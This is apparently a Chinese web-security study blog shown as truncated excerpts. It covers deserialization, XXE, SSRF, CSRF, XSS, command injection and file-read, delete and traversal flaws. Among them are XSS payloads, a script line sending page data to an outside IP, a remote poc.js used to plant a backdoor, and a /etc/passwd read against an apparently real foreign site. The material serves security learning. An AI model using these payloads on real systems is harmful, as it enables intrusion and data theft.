简单理解序列化
1234567序列化相当于一台电脑,将其拆分为机箱,电源,cpu,内存,这样的零件反序列化,相当于将这些零件重新组装序列化:对象转换为数组或字符串等格式反序列化:将数组或字符串等格式转换成对象serialize() //将对象转换成一个字符串unserialize() //将字符串还原成一个对象
常见魔术方法12345678910111213141516171819202122232425262728293031__construct(): //当对象 new 的时候会自动调用__destruct(): 当对象被销毁时会被自动调用__sleep(): //serialize()执行时被自动调用__wakeup(): //unserialize()时会被自动调用__invoke(): //当尝试以调用函数的方法调用一个对象时会被自动调用__toString(): //把类当作字符串使用时触发__call(): //调用某个方法 若方法存在 则调用 若不存在 则会去调用 __call 函数。__callStatic(): 在静态上下文中调用不可访问的方法时 ...
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。
XXE漏洞全称XML External Entity Injection,即XML外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。
XML与HTML对比
XML被设计为传输和存储数据,其焦点是数据的内容。
HTML被设计用来显示数据,其焦点是数据的外观。
HTML旨在显示信息,而XML旨在传输信息。
不同协议支持的在xml这里支持的不一样:
XXE本地靶场
通过抓包发现传输数据包的格式是xml的格式。
那么还可以通过burp自带的扫描方式进行xml格式的搜索:
常用的Payload12345678910111213141516171819202122232425262728293031323334353637383940414243参考:https://www.cnblogs.com ...
常见功能点:1234567891011Web管理界面:配置主机名、IP地址、网关等系统参数,以及重启、关机等系统操作。系统信息查询:诸如ping、nslookup、查看系统版本等功能。文件操作:包括文件上传、下载、删除等功能。(这种跟代码有关系,如果对方代码中删除文件使用的是系统命令进行删除,过滤不严谨的 )邮件发送:构建邮件内容并发送,如果未正确处理用户输入,可能被注入命令。图片处理:一些站点可能调用外部程序来处理图片,如格式转换等,若未对用户输入进行过滤,可能存在命令注入。其他外部程序调用:只要是应用程序调用外部程序来完成功能,都可能存在命令注入风险
危险函数PHP—危险函数12345代码执行函数:eval()、 assert() 、 preg_replace() 、 create_function() 、 array_map() 、call_user_func() 、 call_user_func_array() 、 array_filter() 、uasort() 等 命令执行函数:system()、 exec() 、 shell_exec() 、 pcntl_exec ...
SSRF漏洞原理
12345678SSRF(Server Side Request Forgery: 服务器端请求伪造 )一种由攻击者构造形成由服务端发起请求的一个安全漏洞一般情况下,SSRF 攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。
demo测试代码演示
源代码:
1234567891011121314151617181920212223242526272829303132远程图片加载器<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><form action="" method="POST">请输入图片地址:<input type='text' name='url'& ...
原理经典场景:
1234假设用户登录某银行网站后,未退出登录。攻击者向用户发送一封邮件,内含一个恶意链接(如 https://bank.com/transfer?to=attacker&amount=1000)。用户点击链接后,浏览器向银行服务器发送转账请求,同时自动携带用户的登录 Cookie。银行服务器验证 Cookie 有效,认为是用户操作,执行转账。
防护措施
123--对敏感信息的操作增加安全的token;--对敏感信息的操作增加安全的验证码;--对敏感信息的操作实施安全的逻辑流程,比如修改密码时,需要先校验旧密码等。
攻击条件:
1234条件:1、需要请求伪造数据包(如果是后台功能点,要么进了后台研究,要么只能从白盒的角度进行研究了)2、无过滤防护,有过滤防护能绕过3、受害者需要触发(钓鱼)
CSRF常出现的功能点1234567891011留言板、论坛:用户发表、编辑、删除评论或帖子。后台管理:管理员修改网站配置、用户权限、删除数据等操作。用户中心:用户修改个人资料、密码、邮箱等敏感信息。在线购物:用户添加、删除购物车商品,确认订单,修改收货地址等。银行转 ...
CSP策略
12345678910<meta charset="utf-8"><?php//只允许加载本地源图片://header("Content-Security-Policy:img-src 'self' ");setcookie('name', 'xiaodi');setcookie('pass', '123456');?>//加载的是一张我随意百度的图片<img src="https://img1.baidu.com/it/u=1838809789,205932933&fm=253&fmt=auto&app=138&f=JPEG?w=889&h=500"/><script>var url='http://47.94.236.117/get.php?u='+window.location.href+'&a ...
XSS 跨站 - 攻击利用 - 数据提交获取小皮面板 cookie 发现还是无法登录,因为还有其他防护,所以下面进行 xss 的高级用法。
条件:熟悉后台业务功能数据包,利用 JS 写一个模拟提交利用:凭据获取不到或有防护无法利用凭据进入时执行其他
演示小皮面板小皮面板安装包文末自取,这个是安装在 Windows 的,小迪演示的时候是阿里云开了台 Windows Server 的服务器,我是直接在 win10 上安装搭建的,记得把 Windows 的防火墙关了,不然 poc 创建不了那个 1.php,我就是没开,所以刚开始的时候一直没有成功,后来猜测是防火墙的原因,关了之后才可以。要是关了防火墙还不行,那就需要把那个病毒防护也关了。
原理登录失败日志用户名处写入远程引用 js (也就是在自己的服务器上放好 poc.js, 并且可以访问到),当管理员查看操作日志时,触发 js 代码,在网站写入后门。如用户名为:admin<script src="www.xxx.xx/poc.js"></script>
poc.js 源代码使用方式,修改写入路径 ...
XSS的分类:https://www.fooying.com/the-art-of-xss-1-introduction/
SVG—XSS12345678910SVG(Scalable Vector Graphics)是一种基于 XML 的二维矢量图格式,和我们平常用的 jpg/png 等图片格式所不同的是 SVG 图像在放大或改变尺寸的情况下其图形质量不会有所损失,并且我们可以使用任何的文本编辑器打开 SVG 图片并且编辑它,目前主流的浏览器都已经支持 SVG 图片的渲染。poc:<svg xmlns="http://www.w3.org/2000/svg" version="1.1"> <circle cx="100" cy="50" r="40" stroke="black" stroke-width="2" fill="red" /> <script>alert(1)< ...
XSS跨站-输入输出-原理&分类&闭合12xss常用标签:https://www.freebuf.com/articles/web/340080.html
123456789101112-数据交互的地方get 、 post 、 headers反馈与浏览富文本编辑器各类标签插入和自定义-数据输出的地方用户资料数据输出评论,留言等关键词、标签、说明文件上传
反射型XSS常见情况是攻击者通过构造一个恶意链接的形式,诱导用户传播和打开,
由于链接内所携带的参数会回显于页面中或作为页面的处理数据源,最终造成XSS攻击。
如上代码,接收用户输入的任何值。
这里如果还是正常的去输入:<script>alert(1)</script>是输出不了的,因为这里标签没有正常闭合,需要闭合标签:
1http://127.0.0.1/include.php?x=x' onerror=alert(1)<'
存储型XSS
这里和宝塔那个很像,都是日志会记录用户名的操作,然后导致的XSS
DOM型XSS
文件读取&下载
1http://67.202.70.133/files/readfile.php?file=/etc/passwd
利用:常规下载敏感文件(数据库配置(优先找),中间件配置,系统密匙等文件信息)
外国网站,任意文件读取:
文件删除(常出现后台中)可能存在安全问题:前台或后台有删除功能应用
利用:一般是删除安装系统的锁定文件:install_lock,然后访问安装目录可以安装就说明可以安装成功,其他属于高危操作
后台有删除功能:
看看是否可以通过目录穿越删除其他文件
尝试绕过,猜测是否代码中是否有对:templets
成功删除。
目录穿越
像这样的管理目录的功能,如果控制不严,就会导致目录穿越。
类似这样的文件编辑,控制不当,同样会造成目录穿越。
目录遍历
123456789101112黑盒分析:1、功能点文件上传,文件下载,文件删除,文件管理器等地方2、URL特征文件名:download,down,readfile,read,del,dir,path,src,Lang等参数名:file、path、data、filepath、readfile、 ...